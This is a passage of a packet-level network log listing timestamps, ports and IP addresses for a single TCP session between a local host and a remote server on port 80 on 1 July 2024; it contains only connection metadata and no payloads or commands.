Jul 1, 2024 13:02:14.649538994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649549961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649560928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649573088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649583101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649595022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649605036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.649605989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649619102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649630070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649630070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.649641991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649648905 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.649653912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649666071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649667025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.649678946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.649728060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.649728060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.650459051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650473118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650476933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650487900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650500059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650509119 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650518894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.650520086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650533915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650547028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650557995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650562048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.650569916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650572062 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.650582075 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650593996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650597095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.650607109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650614023 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.650618076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.650636911 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.650702000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.651390076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651402950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651413918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651426077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651438951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651451111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651453972 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.651460886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651472092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651479006 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.651484013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651495934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651498079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.651508093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651520014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651520014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.651531935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651542902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651542902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.651554108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.651571989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.651613951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.651613951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.652312040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652326107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652338028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652348995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652359962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652371883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652373075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.652384996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652396917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652407885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652414083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.652420044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652431011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652431965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.652450085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.652510881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.652909040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652923107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652932882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652945042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652955055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652965069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652971983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.652971983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652983904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.652997017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653007984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653012991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653012991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653040886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653053045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653057098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653057098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653064966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653078079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653089046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653091908 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653101921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653112888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653112888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653125048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653136015 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653155088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653340101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653879881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653893948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653904915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653917074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653928041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653939962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653940916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653953075 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653964996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653970957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653975964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.653985977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.653987885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654001951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654012918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654015064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654026031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654036999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654038906 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654047966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654058933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654059887 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654071093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654073000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654087067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654165030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654819965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654833078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654841900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654851913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654861927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654871941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654882908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654887915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654894114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654902935 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654905081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654915094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654922962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654926062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654934883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654942036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654944897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654957056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654964924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654969931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654975891 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654984951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.654995918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.654997110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655046940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.655046940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.655740976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655752897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655762911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655772924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655781031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655791044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655802011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655805111 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.655812025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655822039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655832052 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.655832052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655842066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655852079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655857086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.655857086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.655862093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655873060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655881882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655890942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655899048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.655900955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655911922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655920982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.655940056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.655940056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.656001091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.656599045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656610966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656620979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656637907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656646967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656657934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656666994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656672955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.656685114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656694889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656696081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.656696081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.656704903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656716108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656725883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656733036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.656737089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656749964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656759977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656764030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.656764030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.656769991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656780958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.656797886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.656819105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.657627106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657639980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657649994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657660007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657670021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657680035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657690048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657692909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.657700062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657711029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657713890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.657720089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657723904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.657728910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657738924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657747984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657758951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657767057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657774925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.657776117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657787085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657793045 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.657795906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657805920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.657814026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.657860041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.658562899 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658576012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658586025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658596992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658606052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658616066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658624887 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658632994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.658636093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658646107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658646107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.658657074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658658028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.658667088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658677101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658685923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658695936 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.658695936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658705950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658714056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.658714056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.658716917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658726931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658737898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658741951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.658746004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.658761978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.658987999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.659521103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659533978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659542084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659553051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659563065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659568071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659578085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659584999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.659586906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659599066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659606934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659620047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659625053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.659625053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.659630060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659638882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659646988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.659650087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659658909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659670115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659679890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659683943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.659689903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659699917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.659740925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.659740925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.659821033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.660367012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660386086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660398006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660408020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660437107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.660475016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660490990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660492897 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.660495996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660501957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660507917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660512924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660518885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660527945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660537004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660542965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.660551071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.660590887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.660590887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.661173105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661186934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661196947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661207914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661217928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661235094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.661402941 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.661607981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661669970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661679983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661796093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661797047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.661808014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661819935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661829948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.661844969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.661935091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.668963909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.669001102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.669013023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.669051886 CEST	49705	80	192.168.2.5	147.45.78.162
